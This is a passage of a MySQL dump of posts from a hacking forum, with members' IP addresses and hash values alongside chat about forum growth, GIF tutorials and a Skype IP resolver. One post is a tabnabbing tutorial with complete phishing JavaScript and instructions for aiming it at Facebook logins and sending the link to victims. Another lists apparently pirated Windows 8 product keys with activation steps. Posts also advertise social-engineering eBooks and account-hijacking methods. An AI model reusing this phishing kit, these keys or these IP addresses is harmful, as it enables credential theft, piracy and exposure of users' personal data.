'1', 't3h jok3r', '1348542336', 'Congratz LH, thanks for contributing and to everyone who participated. I also appreciate the spammers that came here and spammed threads and their posts which helped us with more activity :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6fd7d5834d1b39297b6006a24f5e161d', '0', '0'); INSERT INTO mybb_posts VALUES('2575', '513', '2559', '3', 'RE: The 500 threads celebration thread :)', '0', '1', 't3h jok3r', '1348543357', '[quote=\'iTzIpod\' pid=\'2559\' dateline=\'1348537959\']\r\nAre you adding a Milestones Subforum? Just so we can post everything in there? :p\r\n[/quote]\r\nWe don\'t really have much milestones at the moment so it would be inactive.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '19e14d0765997c1815c8125a49e143c0', '0', '0'); INSERT INTO mybb_posts VALUES('2576', '518', '2574', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348543604', '[quote=\'t3h jok3r\' pid=\'2574\' dateline=\'1348542990\']\r\nTrue. I\'m trying my best now, I didn\'t advertise for 2 weeks. I lost a lot yesterday and lost a lot of data ever since my PC got fucked.\r\n\r\nI emptied my PP yesterday and will use the new monetizing ebook you released.\r\n\r\n[b]Edited[/b]\r\n\r\nOff Topic (AKA Lounge) reached 400 posts. Today LH has started to settle, Congratz LH.\r\n[/quote]\r\n\r\nSomeday, we would have to make up for the downtime.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68ffaf6ccb161af003159f12939863b4', '0', '0'); INSERT INTO mybb_posts VALUES('2577', '518', '2576', '7', 'RE: 2,500 Total Forum Posts', '0', '1', 't3h jok3r', '1348544001', '[quote=\'iTzIpod\' pid=\'2576\' dateline=\'1348543604\']\n[quote=\'t3h jok3r\' pid=\'2574\' dateline=\'1348542990\']\nTrue. I\'m trying my best now, I didn\'t advertise for 2 weeks. I lost a lot yesterday and lost a lot of data ever since my PC got fucked.\n\nI emptied my PP yesterday and will use the new monetizing ebook you released.\n\n[b]Edited[/b]\n\nOff Topic (AKA Lounge) reached 400 posts. Today LH has started to settle, Congratz LH.\n[/quote]\n\nSomeday, we would have to make up for the downtime.\n[/quote]\n\nTrue and the day we get the double of expect, that day will be the day LH will would start dominating computing forums by MyBB. If members like Baws, JakeUS, Timmy, HoverCatz, Thunder, duhuh etc come back to LH or become a bit more active. EX: If they make 2 posts a day and if they make 4 posts now or 2 posts and 1 thread then if we start this process at the starting of October then by November I can bet that LH would have around 1K threads and 4-5K posts.', '72.231.24.165', '1223104677', '1', '0', '1', '1348544187', '1', '0869d84e7922dff2dce58429750d6e66', '0', '1348544187'); INSERT INTO mybb_posts VALUES('2578', '439', '2563', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348544675', '[quote=\'iTzIpod\' pid=\'2563\' dateline=\'1348538400\']\r\nUpdate, we are still recruiting. I suggest you try out since who knows? I might like your application and you can win access to HQ and Unique Exclusive stuff. Such as Leaks, Programs, Cracks, Methods, eBooks, and many more.\r\n[/quote]\r\n\r\nDid you decline or approve timmy?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cd5aec8c8fc3822edb93e9e278e8fecf', '0', '0'); INSERT INTO mybb_posts VALUES('2579', '515', '2558', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348544709', '[quote=\'iTzIpod\' pid=\'2558\' dateline=\'1348537925\']\r\nBy green one, you mean the green button that says Enter and Vote?\r\n\r\n\r\nAlso, remember to vote every 24 hours! :D\r\n[/quote]\r\n\r\nYes that\'s correct. It doesn\'t matter if you vote once or multiple times because it only counts one vote.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0608a237ad1fe4687b64e70ae5d8cbd0', '0', '0'); INSERT INTO mybb_posts VALUES('2580', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '1', 't3h jok3r', '1348544823', 'Just waiting for NXK and for the icon the best bet is to ask NXK.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ba52f032d2534a02bf09d9c6ed2d6c3', '0', '0'); INSERT INTO mybb_posts VALUES('2581', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348573449', 'Approved. Welcome to Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a9ca181d977a8f0de203835c625c57b', '0', '0'); INSERT INTO mybb_posts VALUES('2582', '511', '2544', '5', 'RE: New forums suggestions', '0', '82', 'iTzIpod', '1348573568', 'Alright. Movie Rips seems nice.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dc6024646958e8791e2ec8a89ddad07e', '0', '0'); INSERT INTO mybb_posts VALUES('2583', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348574133', '[spoiler=Virus Scan (VirusTotal)] [url=https://www.virustotal.com/file/9b83f9bb50746b0d039ed72d85133763137674690f72a22ef556b733de0eb878/analysis/1348573743/] Click[/url][/spoiler]\r\n\r\n\r\nVirus scanned it with Virus Total ^ Also, tested it on my Skype. Resolved the right IP.\r\nHopefully no one DDoSes me :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0412036caa21c089237a015cc8eeb75c', '0', '0'); INSERT INTO mybb_posts VALUES('2584', '431', '2531', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348589390', '[quote=\'NXK\' pid=\'2531\' dateline=\'1348497554\']\nSize: Signature \nColour Scheme: Any \nRender/Image: Aby thing you\'d like\nText: NXk\nAnything else: I just want a signature, I\'m not good at making them so if you could help me out that would be nice. I don\'t mind what it looks like you can choose and do whatever you\'d like.\n[/quote]\n\nhad no idea what you liked so I just made a simple one.\n\n[img]http://i.imgur.com/SSlBX.gif[/img]\n\nhope you liked it.', '46.50.93.164', '775052708', '1', '0', '62', '1348589498', '1', 'bb6c817b5b200c3b8776f3bf0fd217f6', '0', '1348589498'); INSERT INTO mybb_posts VALUES('2585', '514', '2551', '9', 'RE: How to make serious money', '0', '53', 'sirchamp', '1348597114', 'Yeah. This is quite well known but still its a great method. Im going to try this', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5e491f81aa5c36c3da93996288957cd4', '0', '0'); INSERT INTO mybb_posts VALUES('2586', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348600985', 'This is on 2 different forums right now since i\'m active on other forums, but I will work on a l33thacking only skype resolver. Maybe try to implement a log in system or something.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'bb739b48c8bbda6a84dcc4e99961defa', '0', '0'); INSERT INTO mybb_posts VALUES('2609', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348618561', 'I know it\'s quite known. But not really. A lot of users don\'t know this method. And so that\'s one thing. Also, this method is unsaturated.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8db95f0643de15f99fbd68a28848f78e', '0', '0'); INSERT INTO mybb_posts VALUES('2588', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348608070', 'That would be great. That would probably stop leakers leaking our content. Such as your Skype IP Resolver. They would have to register on L33tHacking to use the Resolver. If that\'s what you mean by \"[b]Maybe try to implement a log in system or something.[/b]\"', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '62859233dfc0d02c1759344854babb16', '0', '0'); INSERT INTO mybb_posts VALUES('2589', '519', '2588', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348608200', '[quote=\'iTzIpod\' pid=\'2588\' dateline=\'1348608070\']\r\nThat would be great. That would probably stop leakers leaking our content. Such as your Skype IP Resolver. They would have to register on L33tHacking to use the Resolver. If that\'s what you mean by \"[b]Maybe try to implement a log in system or something.[/b]\"\r\n[/quote]\r\n\r\nYeah it is, Or a HWID system.\n[hr]\nAPI is down, Closing thread until I get a new one.', '99.253.94.204', '1677549260', '1', '0', '61', '1348629563', '1', 'c3b3f4da94b0c13d5c69472c78b4be20', '0', '0'); INSERT INTO mybb_posts VALUES('2590', '520', '0', '34', 'How to make .GIF photos', '0', '82', 'iTzIpod', '1348615310', 'I am going to show you how to make a Video Gif like this:\r\n[img]http://i108.photobucket.com/albums/n37/CodeLyokoFreak1/7dcda2aa.gif[/img]\r\nBy using Photoshop.\r\nFirst you are going to want to go to keepvid.com/ and put the video URL you would like.\r\nNext. once it pops up with what to download.. Make sure you download the .MP4\r\n\r\nYOU ARE GOING TO WANT TO USE A VIDEO EDITING PROGRAM TO SHORTEN THE VIDEO TO THE PART YOU WOULD LIKE BECAUSE PS WILL NOT SUPPORT THAT MANY FRAMES\r\n\r\nOnce you have edited your video. Open it in PS by going to.. FILE<IMPORT<VIDEO FRAMES TO LAYERS\r\n\r\nOnce you find your video. Select it and click open\r\n\r\nThen this will pop up\r\n[img]http://gyazo.com/b22975112e75b4c820b54a3eb4897618.png[/img]\r\n\r\nMake sure it looks just like that\r\n\r\nThen Click Ok\r\n\r\nAllow it to make the layers(may take a minute)\r\n\r\nOnce opened it should look like this\r\n[img]http://gyazo.com/7bd880312b59332e2eefb72577b7c972.png[/img]\r\n\r\nOnce video is open. delete any unwanted Frames or add whatever text you would like\r\n\r\nThen you do a.. File. Save for web and devices\r\n\r\nThe video may take a while to load..\r\n\r\nonce that is done. make sure. you save is as a .GIF\r\n\r\nThe upload time to Photobucket takes a while. Just be patient', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '977988cb78ae508463e561e237d77894', '0', '0'); INSERT INTO mybb_posts VALUES('2591', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '1', 't3h jok3r', '1348615432', 'Nice tutorial, even though Photoshop creates proffesional .gif images I think online video .GIF images are easier to create it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ef5b913ce9ce26d636bdebfbbaf40b7f', '0', '0'); INSERT INTO mybb_posts VALUES('2592', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '82', 'iTzIpod', '1348615845', 'Thanks. Gonna fix all grammar and spelling mistakes on this thread after. Currently making an eBook on how to SE Starbucks xD (Just gonna be a paragraph calm your tits).', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb55ce0d1126b7ffa40a87827e085523', '0', '0'); INSERT INTO mybb_posts VALUES('2593', '431', '2584', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '61', 'NXK', '1348616466', 'That\'s actually awesome man, Thank you!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e97e7ae87aff1a65afbe0a122f9c207b', '0', '0'); INSERT INTO mybb_posts VALUES('2594', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348616976', 'Nice signature NXK ;) \n\nStill waiting for the Unique Userbars. Take your time like I said. Don\'t need to rush it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4431ce000fcdbc06ab6d7f1fd5bbe7b', '0', '0'); INSERT INTO mybb_posts VALUES('2595', '511', '2544', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348617109', 'Cool what about the computing and coding?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '645dcf33f89c6375c26fab1e18940452', '0', '0'); INSERT INTO mybb_posts VALUES('2596', '474', '2315', '25', 'RE: What antivirus you have?', '0', '7', 'Romdu62', '1348617350', '[quote=\'HoverCatz\' pid=\'2315\' dateline=\'1348004061\']\r\nMicrosoft Security Essentials (The best free)\r\n[/quote]\r\n\r\nI agree but still can\'t detect shit.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'db9b79252b1e5f6e375e0c2d2527c73b', '0', '0'); INSERT INTO mybb_posts VALUES('2597', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '7', 'Romdu62', '1348617420', 'Awesome, looks beast. Thanks for the PSD.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '67c7429ab5c8f71988d6fb566e8e41f1', '0', '0'); INSERT INTO mybb_posts VALUES('2598', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '7', 'Romdu62', '1348617470', 'Learned a lot today thanks for the links.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '86278a6f8b60098dc3eb4fd7f76eb122', '0', '0'); INSERT INTO mybb_posts VALUES('2599', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '7', 'Romdu62', '1348617546', 'Another great Photoshop tutorial.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1fa8eea8023f6c90ede07d712183e626', '0', '0'); INSERT INTO mybb_posts VALUES('2600', '511', '2544', '5', 'RE: New forums suggestions', '0', '82', 'iTzIpod', '1348617738', 'I don\'t know? :/ Like I said before, I\'ll suggest some forums when I\'m in a good mood. Because right now is not the time. Sorry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '90d454bb128649acbaaeebbdef991498', '0', '0'); INSERT INTO mybb_posts VALUES('2601', '520', '2590', '34', 'RE: How to make .GIF photos', '0', '82', 'iTzIpod', '1348617772', 'Thank you for your feedback. Hopefully everyone can check this out and give it a try :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66da2274361a3ae90d426d984961f482', '0', '0'); INSERT INTO mybb_posts VALUES('2602', '521', '0', '46', 'Advanced Tabnabbing Tutorial', '0', '5', 'Timmy', '1348617955', 'I will explain this tutorial using attack scenario and live example and how to protect yourself from such stuff.\r\nLet consider a attack scenario:\r\n1. A hacker say(me Lokesh) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)\r\n2. I (Lokesh) sends a copy of this web page to victim whose account or whatever i want to hack.\r\n3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.\r\n4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.\r\n5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.\r\n6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.\r\nHere end\'s the attack scenario for advanced tabnabbing.\r\n\r\nNote: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.\r\n\r\nBefore coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.\r\n\r\nFollow below measure to protect yourself from Tabnabbing:\r\n1. Always use anti-java script plugin\'s in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.\r\n2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.\r\n3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL\'s.\r\n4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.\r\n5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.\r\n\r\nThat ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..\r\n\r\nNote: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.\r\n\r\nFirst sample code for doing tabnabbing with the help of iframes: \r\n <!--\r\nTitle: Advanced Tabnabbing using IFRAMES and Java script\r\nAuthor: De$trUcTiVe M!ND (lokesh@hackingloops.com)\r\nWebsite: http://www.hackingloops.com\r\nVersion:1.6\r\n-->\r\n\r\n[code]\r\n<html>\r\n<head><title></title></head>\r\n<style type=\"text/css\">\r\nhtml {overflow: auto;}\r\nhtml, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}\r\niframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}\r\n</style>\r\n<body>\r\n\r\n<script type=\"text/javascript\">\r\n//----------Set Script Options--------------\r\nvar REAL_PAGE_URL = \"http://www.google.com/\"; //This is the \"Real\" page that is shown when the user first views this page\r\nvar REAL_PAGE_TITLE = \"Google\"; //This sets the title of the \"Real Page\"\r\nvar FAKE_PAGE_URL = \"http://www.hackingloops.com\"; //Set this to the url of the fake page\r\nvar FAKE_PAGE_TITLE = \"HackingLoops| Next Generation Hackers Portal\"; //This sets the title of the fake page\r\nvar REAL_FAVICON = \"http://www.google.com/favicon.ico\"; //This sets the favicon. It will not switch or clear the \"Real\" favicon in IE.\r\nvar FAKE_FAVICON = \"http://www.hackingloops.com/favicon.ico\"; //Set\'s the fake favicon.\r\nvar TIME_TO_SWITCH_IE = \"4000\"; //Time before switch in Internet Explorer (after tab changes to fake tab).\r\nvar TIME_TO_SWITCH_OTHERS = \"10000\"; //Wait this long before switching .\r\n//---------------End Options-----------------\r\nvar TIMER = null;\r\nvar SWITCHED = \"false\";\r\n\r\n//Find Browser Type\r\nvar BROWSER_TYPE = \"\";\r\nif(/MSIE (\\d\\.\\d+);/.test(navigator.userAgent)){\r\n BROWSER_TYPE = \"Internet Explorer\";\r\n}\r\n//Set REAL_PAGE_TITLE\r\ndocument.title=REAL_PAGE_TITLE;\r\n\r\n//Set FAVICON\r\nif(REAL_FAVICON){\r\n var link = document.createElement(\'link\');\r\n link.type = \'image/x-icon\';\r\n link.rel = \'shortcut icon\';\r\n link.href = REAL_FAVICON;\r\n document.getElementsByTagName(\'head\')[0].appendChild(link);\r\n}\r\n\r\n//Create our iframe (tabnab)\r\nvar el_tabnab = document.createElement(\"iframe\");\r\nel_tabnab.id=\"tabnab\";\r\nel_tabnab.name=\"tabnab\";\r\ndocument.body.appendChild(el_tabnab);\r\nel_tabnab.setAttribute(\'src\', REAL_PAGE_URL);\r\n\r\n//Focus on the iframe (just in case the user doesn\'t click on it)\r\nel_tabnab.focus();\r\n\r\n//Wait to nab the tab!\r\nif(BROWSER_TYPE==\"Internet Explorer\"){ //To unblur the tab changes in Internet Web browser\r\n el_tabnab.onblur = function(){\r\n TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);\r\n }\r\n el_tabnab.onfocus= function(){\r\n if(TIMER) clearTimeout(TIMER);\r\n }\r\n} else {\r\n setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);\r\n}\r\n\r\nfunction TabNabIt(){\r\n if(SWITCHED == \"false\"){\r\n //Redirect the iframe to FAKE_PAGE_URL\r\n el_tabnab.src=FAKE_PAGE_URL;\r\n //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON\r\n if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;\r\n\r\n //Change the favicon -- This doesn\'t seem to work in IE\r\n if(BROWSER_TYPE != \"Internet Explorer\"){\r\n var links = document.getElementsByTagName(\"head\")[0].getElementsByTagName(\"link\");\r\n for (var i=0; i<links.length; i++) {\r\n var looplink = links[i];\r\n if (looplink.type==\"image/x-icon\" && looplink.rel==\"shortcut icon\") {\r\n document.getElementsByTagName(\"head\")[0].removeChild(looplink);\r\n }\r\n }\r\n var link = document.createElement(\"link\");\r\n link.type = \"image/x-icon\";\r\n link.rel = \"shortcut icon\";\r\n link.href = FAKE_FAVICON;\r\n document.getElementsByTagName(\"head\")[0].appendChild(link);\r\n }\r\n }\r\n}\r\n</script>\r\n\r\n</body>\r\n</html>\r\n[/code]\r\n\r\nNow what you need to replace in this code to make it working say for Facebook:\r\n1. REAL_PAGE_URL : www.facebook.com\r\n2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More\r\n3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL\r\n4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More\r\n5. REAL_FAVICON : www.facebook.com/favicon.ico\r\n6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)\r\n7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.\r\n8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.\r\n9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original \'real\' page or some other Page.\r\n\r\nNow as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).\r\n\r\nThat\'s all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.\r\n\r\nCredits in the thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '58f0cb8b2d4f0a1b5602da890ff76c42', '0', '0'); INSERT INTO mybb_posts VALUES('2603', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '5', 'Timmy', '1348618001', 'Thanks for this, learned something new today.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b98b1381e12d4465d2c98b8a5ccae791', '0', '0'); INSERT INTO mybb_posts VALUES('2605', '248', '1056', '16', 'RE: [Free][EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1348618113', 'Updated links. Sorry for broken link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83c7458c7d238cae8e6f4985a2c68a20', '0', '0'); INSERT INTO mybb_posts VALUES('2606', '247', '1055', '16', 'RE: [Free][EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1348618162', 'Updated links. Sorry for the broken link. :/\nFixed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e06d667515989a8ba28f64839f4978be', '0', '0'); INSERT INTO mybb_posts VALUES('2604', '494', '2447', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '5', 'Timmy', '1348618056', '[quote=\'iTzIpod\' pid=\'2447\' dateline=\'1348277992\']\r\nBut your body needs the nutrients the food gives you..\r\n[/quote]\r\n\r\nI agree and you guys also need ATP.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a87d7379516e4a6b5c5b4b1a640c8ec4', '0', '0'); INSERT INTO mybb_posts VALUES('2607', '522', '0', '16', '[Free][EBook] How to SE Starbucks', '0', '82', 'iTzIpod', '1348618387', 'Hey LH,\r\nJust trying to contribute to the forums.\r\n\r\nThis eBook will not be guaranteed to work 100%. But it still works if you got the skills. \r\n\r\nTo Download: \r\n\r\nhttp://adf.ly/DB5lZ', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c02d54d90c8d30ab2e3ed1dd0d450788', '0', '0'); INSERT INTO mybb_posts VALUES('2608', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '82', 'iTzIpod', '1348618476', 'I don\'t need to use this method, I don\'t own a Xbox. Not planning on getting one too.\n\nGood luck everyone going to try this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '036351c28554b2073b13a7333d4c05ef', '0', '0'); INSERT INTO mybb_posts VALUES('2610', '511', '2544', '5', 'RE: New forums suggestions', '0', '61', 'NXK', '1348629091', 'Ill send the gamers section info soon.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd0c1e81536044c06fa1a44c14e645477', '0', '0'); INSERT INTO mybb_posts VALUES('2611', '511', '2610', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348629239', '[quote=\'NXK\' pid=\'2610\' dateline=\'1348629091\']\r\nIll send the gamers section info soon.\r\n[/quote]\r\n\r\nPerfect and your thoughts on the computing and coding sections?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2d28d6b0c5dbf1cb3a4cc1fbf5e1aafe', '0', '0'); INSERT INTO mybb_posts VALUES('2612', '511', '2611', '5', 'RE: New forums suggestions', '0', '61', 'NXK', '1348630357', '[quote=\'t3h jok3r\' pid=\'2611\' dateline=\'1348629239\']\r\n[quote=\'NXK\' pid=\'2610\' dateline=\'1348629091\']\r\nIll send the gamers section info soon.\r\n[/quote]\r\n\r\nPerfect and your thoughts on the computing and coding sections?\r\n[/quote]\r\nI\'m fine with it all!\r\n\r\nId love to see more sections', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '5b37f82bca6af25dd6679a3cd09b97eb', '0', '0'); INSERT INTO mybb_posts VALUES('2636', '490', '2635', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348707447', '[quote=\'R?????zo?\' pid=\'2635\' dateline=\'1348692042\']\r\nadd it like\r\n\r\nConsoles (PS3, XBOX, etc)\r\nMobile and Tablet Gaming (iOS and Android)\r\n[/quote]\r\n\r\nSo sections like PS3, XBOX should be subforums?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ed2a1a35cf37d9c4850f07de8312e10d', '0', '0'); INSERT INTO mybb_posts VALUES('2614', '511', '2612', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348678258', '[quote=\'NXK\' pid=\'2612\' dateline=\'1348630357\']\r\n[quote=\'t3h jok3r\' pid=\'2611\' dateline=\'1348629239\']\r\n[quote=\'NXK\' pid=\'2610\' dateline=\'1348629091\']\r\nIll send the gamers section info soon.\r\n[/quote]\r\n\r\nPerfect and your thoughts on the computing and coding sections?\r\n[/quote]\r\nI\'m fine with it all!\r\n\r\nId love to see more sections\r\n[/quote]\r\n\r\nThat\'s what this thread is for. What new sections would you like to see in the computing and coding section?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eec3b4a678c70c0cd275591bda107c5e', '0', '0'); INSERT INTO mybb_posts VALUES('2615', '523', '0', '43', 'Windows 8 Pro Keys', '0', '1', 't3h jok3r', '1348679720', '1. Do a CLEAN install using one of these keys(IMPORTANT)\n2. Do Not Turn on your internet connection.\n3. Open the activation window and choose \"Activate by phone\" button.\n4. Call Microsoft and enter the code from the automated message that you will hear. It works best with a real phone or mobile phone since you\'re going to call to a free number in your living country.\n5. Microsoft Volume Licensing Activation Centers Worldwide Telephone Numbers\nMicrosoft Volume Licensing - Activation Centers\n6. If they ask about the number of computers that you will use this key, choose 1.\n\n[code]\n967N4-R7KXM-CJKJB-BHGCW-CPKT7\nRRYGR-8JNBY-V2RJ9-TJP4P-749T7\nND8P2-BD2PB-DD8HM-2926R-CRYQH\nF8X33-CNV3F-RH7MY-C73YT-XP73H\nBDDNV-BQ27P-9P9JJ-BQJ96-KTJXV\nKNTGM-BGJCJ-BPH3X-XX8V4-K4PKV\nCDQND-9X68R-RRFYH-8G28W-82KT7\n7HBX7-N6WK2-PF9HY-QVD2M-JK49V\n4NMMK-QJH7K-F38H2-FQJ24-2J8XV\nHNRGD-JP8FC-6F6CY-2XHYY-RCWXV\nKQWNF-XPMXP-HDK3M-GBV69-Y7RDH\nF2M4V-KFNB7-9VVTW-MVRBQ-BG667\nVHNT7-CPRFX-7FRVJ-T8GVM-8FDG7\nGPTCC-XN297-PVGY7-J8FQY-JK49V\nHV3TW-MMNBG-X99YX-XV8TJ-2GV3H\n2GVN8-TV3C2-K3YM7-MMRVM-BBFDH\n84NRV-6CJR6-DBDXH-FYTBF-4X49V\nCR8NP-K37C3-MPD6Q-MBDDY-8FDG7\n39DQ2-N4FYQ-GCY6F-JX8QR-TVF9V\nQ4NBQ-3DRJD-777XK-MJHDC-749T7\nD32KW-GNPBK-CV3TW-6TB2W-K2BQH\nNBWPK-K86W9-27TX3-BQ7RB-KD4DH\n2NF99-CQRYR-G6PQ9-WYGJ7-8HRDH\nF7BDM-KTNRW-7CYQP-V98KC-W2KT7\n4JKWV-MNJCY-8MW3Q-VJYGP-DC73H\nFFX8D-N3WMV-GM6RF-9YRCJ-82KT7\n2CMGK-NMW4P-B846H-YXR6P-27F9V\nD2GBF-NGBW4-QQRGG-W38YB-BBFDH\nNTVHT-YF2M4-J9FJG-BJD66-YG667\nGBJJV-YNF4T-R6222-KDBXF-CRYQH\n3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH\n988NM-XKXT9-7YFWH-H2Q3Q-C34DH\nTGXN4-BPPYC-TJYMH-3WXFK-4JMQH\nN9C46-MKKKR-2TTT8-FJCJP-4RDG7\n2VTNH-323J4-BWP98-TX9JR-FCWXV\nD7KN2-CBVPG-BC7YC-9JDVJ-YPWXV\n2GVN8-TV3C2-K3YM7-MMRVM-BBFDH\n4NMMK-QJH7K-F38H2-FQJ24-2J8XV\n76NDP-PD4JT-6Q4JV-HCDKT-P7F9V\n7HBX7-N6WK2-PF9HY-QVD2M-JK49V\n84NRV-6CJR6-DBDXH-FYTBF-4X49V\n967N4-R7KXM-CJKJB-BHGCW-CPKT7\nBDDNV-BQ27P-9P9JJ-BQJ96-KTJXV\nCDQND-9X68R-RRFYH-8G28W-82KT7\nDWV49-3GN3Q-4XMT7-QR9FQ-KKT67\nF2M4V-KFNB7-9VVTW-MVRBQ-BG667\nF8X33-CNV3F-RH7MY-C73YT-XP73H\nGPTCC-XN297-PVGY7-J8FQY-JK49V\nHV3TW-MMNBG-X99YX-XV8TJ-2GV3H\nJ6FW2-HQNPJ-HBB6H-K9VTY-2PKT7\nKQWNF-XPMXP-HDK3M-GBV69-Y7RDH\nMMRNH-BMB4F-87JR9-D72RY-MY2KV\nN4WY8-DVW92-GM8WF-CG872-HH3G7\nND8P2-BD2PB-DD8HM-2926R-CRYQH\nRRYGR-8JNBY-V2RJ9-TJP4P-749T7\nVHNT7-CPRFX-7FRVJ-T8GVM-8FDG7\n[/code]\n\nThat\'s it!', '72.231.24.165', '1223104677', '1', '0', '1', '1348976941', '1', '0a429ffc301966b1b2c98e400504a979', '0', '1348976941'); INSERT INTO mybb_posts VALUES('2935', '606', '0', '64', 'Forum Rules and Regulations', '0', '1', 't3h jok3r', '1348977158', 'This forum contains illegal viewing of movies and TV shows, so please make sure you follow the rules in this section. L33THacking is not responsible for what you post in this section. If any content in this section belongs to you and you would like it to be removed then PM any staff member of send a DMCA Take Down notice through the 